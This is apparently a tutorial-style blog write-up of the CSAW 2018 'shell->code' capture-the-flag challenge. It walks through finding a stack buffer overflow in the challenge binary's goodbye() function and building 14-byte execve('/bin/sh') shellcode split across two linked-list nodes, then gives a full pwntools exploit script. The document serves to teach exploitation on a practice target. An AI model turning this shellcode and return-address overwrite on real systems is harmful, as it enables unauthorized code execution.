CSAW Write-Up: shell->code
It's been a few weeks since me and the Mechasheep played CSAW, but that doesn't mean there's nothing left to write about.
The first and easiest pwn challenge I encountered during the competition was called shell->code, a baby-class challenge. The simplicity of this challenge means I can actually focus on capturing my process and workflow, which should be especially useful to those new to the world of exploitation.
Overview
After reading the flavor-text,
Pwn
shell->code
Linked lists are great! They let you chain pieces of data together.
nc pwn.chal.csaw.io 9005
I grabbed the binary and dug right in. There's some setup code that isn't really relevant, but the code eventually calls a function called nononode()
. This is where the interesting behavior starts:
What it does isn't terribly obvious, so let me lay out the important details. The code is essentially working with a structure which looks something like this:
struct node
{
node* next;
uint8_t text[15];
};
Specifically, there are two instances of this structures on the stack. The first is at rbp - 0x20
and the second is at rbp - 0x40
. We can actually go to the type view in Binary Ninja, define this structure, and see the types in the disasm.
Note: there are multiple labels on the bottom right of the binja UI. If you click the one that typically says either Graph or Linear Disassembly, you'll find an option to go the the Types view. Here, you can define C-style types which can augment disasm. I don't know why this isn't documented better or more obvious.
With the structure defined, we can press y
on a variable in the disasm to set it's type and n
to set it's name. With that done, we can press i
a few times to cycle through the different representations of the code until we find one that reveals new information at a glance. Here's the same function again:
Now the behavior is easy to see: the code links the nodes with node_1.next = node_2
, then fills the text
member of these nodes using two calls to readline()
with a length of 15, specified on esi
as 0xF
.
The readline()
function isn't particularly interesting, but let's look at it anyways:
This code calls the getline()
function. This call allocates a buffer of suitable length and copies a line into that buffer from stdin
. Once the call returns, the code uses strncpy()
to safely copy the line into the 15-byte output buffer, stored at var_20
Note: The allocation happens because
rdi
points to a null pointer. Ifrdi
pointed to a buffer, it would skip allocation and read into the existing buffer.
Okay, let's take step back. Since readline()
is called on each node, we can have a payload which is up to 30 bytes, fragmented into two 15-byte chunks.
Now, there's two more things that happen before nononode()
is done. First, it leaks the address of node_2
with a call to printNode()
:
Then, it calls goodbye()
to wrap up:
Note: this is a good place to talk about thinking like a CTFer. The more you play, the more you will develop a sense for what you'll find where.
In this case, we can be almost certain that the main bug doesn't happen until afterprintNode()
, as that's where the leak is. The leak will differ across executions, so it is reasonable to expect it will happen before we're supposed to throw an exploit; otherwise it's not useful. Sincegoodbye()
is the only remaining code, we know that's exactly where to look for a bug.
This asks for initials, reads them into a 3-byte buffer, and says goodbye %s
with initials
as a format parameter. This might seem innocuous to some people; but we, the attackers, can clearly see the 20-byte read into the 3-byte stack buffer. Uh-oh.
Here's a representation of the 20 bytes we have access to:
struct stackbuf // no alignment padding, aight?
{
uint8_t initials[3];
void* old_rbp;
void* ret_addr;
uint8_t some_byte_in_previous_frame;
};
We control ret_addr
—the address which the RETN
will jump to upon completetion—which means we can cause execution to continue at an arbitrary address. When that happens, rsp
will be valid for the nononode()
frame, meaning we can use rsp
-relative calculations in our fragmented payloads to reference one another; this is much more space efficient than hard-coding addresses calculated from the leak. The leak still has it's purpose, however: it allows us to calculate the value we put into ret_addr
. Because the stack is executable, this is enough to pwn the challenge. We simply need to make the payload fit.
Fragmentsploit
Note: when I wrote my exploit, I thought the 15-byte limit was inclusive of the null terminator. This is wrong, and the shellcode can be 15 bytes. However, since I solved it with 14, let's pretend that's the limit and show how I got there. For fun!
Typically, /bin/sh
shellcode for x64 is around 25-ish bytes. We have enough space for this, as long as the tendons of our payload don't exceed 5 bytes. Instead of throwing a final payload at you cold-turkey, let's talk about what's needed to pop a shell. A syscall
instruction with a call number of 59
on rax
triggers execve()
. This expects some parameters:
rdi
should point to the file to executersi
should point to an array ofchar*
s which comprise the command line arguments. These are tailed by aNULL
pointer.
Here's what this means for us (let's pretend 0xDEADBEEF
points to /bin/sh
, since we want to pop a shell):
rdi
should point be0xDEADBEEF
rsi
should point to the array[0xDEADFBEEF, NULL]
Okay, it seems like we can put /bin/sh
into node_2.text
and, with some finesse, fit the entirety of the shellcode into node_1.text
. Let's generalize the shellcode:
- First, we point
rdi
tonode_1.text
- Then, we create the command line array on the stack, something like
PUSH 0 ; PUSH RDI
. This is backwards because the stack grows towards0x00
- Next, we point
rsi
at this on-stack array - And, finally, we set
rax
to59
and trigger thesyscall
instruction
Now, to save space, we need to use a few tricks. As mentioned before, an rsp
-relative LEA
saves us bytes when pointing to /bin/sh
. We can also optimize the MOV RAX, 59
by using MOV AL, 59
, giving us clean access to the single-byte portion of rax
that we need.
If we front-pad /bin/sh
to fall at the end of node_2.text
, here's what the shellcode looks like:
0: 48 8D 7C 24 10 LEA RDI, [RSP+0x10]
5: 6A 00 PUSH 0x0
7: 57 PUSH RDI
8: 48 89 E6 MOV RSI, RSP
B: B0 3B MOV AL, 59
D: 0F 05 SYSCALL
15 bytes. Just barely too big.
Before we try to trim the length, let's talk about the LEA RDI, [RSP+0x10]
and why it works. When calling nononode()
, the frame is set up so that rsp
is pointing to rbp - 0x40
. We know this to be node_2
. The first 8 bytes are node_2.next
and the following 8 will hold the front-padding before the /bin/sh
string. This means we need to reach 16—hex 0x10
—bytes into node_2
to hit the string.
Now back to optmization. We've covered nearly everything, PUSH 0
being the exception. Pushing a register would save us a byte, but zeroing a register requires a XOR R64, R64
:
0: 48 8D 7C 24 10 LEA RDI, [RSP+0x10]
5: 48 31 F6 XOR RSI, RSI
8: 56 PUSH RSI
9: 57 PUSH RDI
A: 48 89 E6 MOV RSI, RSP
D: B0 3B MOV AL, 59
F: 0F 05 SYSCALL
Of course, this is even longer: 17 bytes. The XOR
accounts for 3 of those bytes, though. The idea is to ditch it, which would put us right at the threshold of 14 bytes. Let's see if we can get a register holding 0
for free.
First, let's start debugging with gdb ./shellpointcode
. Then, let's set a breakpoint on the RETN
in goodbye()
with b *goodbye+70
and use r
to begin execution. Next, let's just provide whatever arbitrary input we feel like, playing by the rules, until we hit the breakpoint. Now, let's type info registers
to see what we've got:
We notice rbx
is 0
at this point. ggwp. We can craft our final shellcode:
0: 48 8D 7C 24 10 LEA RDI, [RSP+0x10]
5: 53 PUSH RBX
6: 57 PUSH RDI
7: 48 89 E6 MOV RSI, RSP
A: B0 3B MOV AL, 59
C: 0F 05 SYSCALL
14 bytes; it makes the cut. Now, let's see if it works.
Pwnthon
Using the pwntools python module, we can write a pretty clean exploitation script which can work on both local and remote instances of the challenge. Let's set up the boilerplate:
from pwn import *
import struct
context(arch='amd64', os='linux') # needed for asm() func to work
local_info = ['./shellpointcode']
remote_info = ['pwn.chal.csaw.io', 9005]
libc_path = ''
if (args.REMOTE):
io = remote(remote_info[0], remote_info[1])
else:
io = process(local_info[0], raw=False)
raw_input() # opportunity to attach gdb
Now, let's send the shellcode as our first line. We can wait until we see the character :
, since the challenge prints that before calling readline()
:
shellcode = """
LEA RDI, [RSP+16]
PUSH RBX
PUSH RDI
MOV RSI, RSP
MOV AL, 59
SYSCALL
"""
io.recvuntil(":")
io.sendline(asm(shellcode))
Next, let's front-pad /bin/sh
and send it as node_2.text
. It's 8 bytes, since we need a null-term, so we must lead with 8 to fill the buffer:
io.recvuntil(":")
io.sendline('.' * 8 + '/bin/sh\x00')
Note: we could have just as easily not padded this, or swapped the positions of the string and shellcode, or many other things. The reasoning for doing it this specific way was arbitrary.
Continuing, let's parse the leak. We know it's a hexadecimal number prefixed with 0x
and followed by a newline:
leak = io.recvuntil("?")
idx = leak.find("0x")
leak = int(leak[idx+2:leak.find("\n", idx)], 16)
print("%x" % leak)
Now, the shellcode is in node_1.text
, which is at (rbp - 0x20) + 8
. The leak points to node_2
, which is at rbp - 0x40
. If we simplify, rbp
cancels out and we're left with (-0x20) + 8
and -0x40
. The difference—or the offset of our shellcode from leak
—is 0x28
:
shelladr = leak + 0x28 # ((-0x20) + 8) - (-0x40)
Finally, we can smash the stack. We need to align the return address because of the 3-byte initials
, hence the leading "aaa"
:
io.sendline("aaa" + p64(shelladr) + p64(shelladr) + p64(0))
Let's top it off by giving us an interactive interface with our shell:
io.interactive()
Homework?
If you want to practice on this challenge, I've got some fun things to try:
- Get it working without padding before
/bin/sh
- Swap the nodes which hold the shellcode and the string
- Try to shorten the shellcode even further
- Try to solve it using ROP
As of writing, the challenge can still be grabbed here. If the link is dead, search for "CSAW 2018"; they're known to keep their challenges online for quite a while.
Flag Secured
I think this challenge is perfect for cutting teeth, and I hope my kinda tutorial-style write-up did it justice. Let me know what you think of the post in the comments, and feel free to ask questions. I'll see you next time!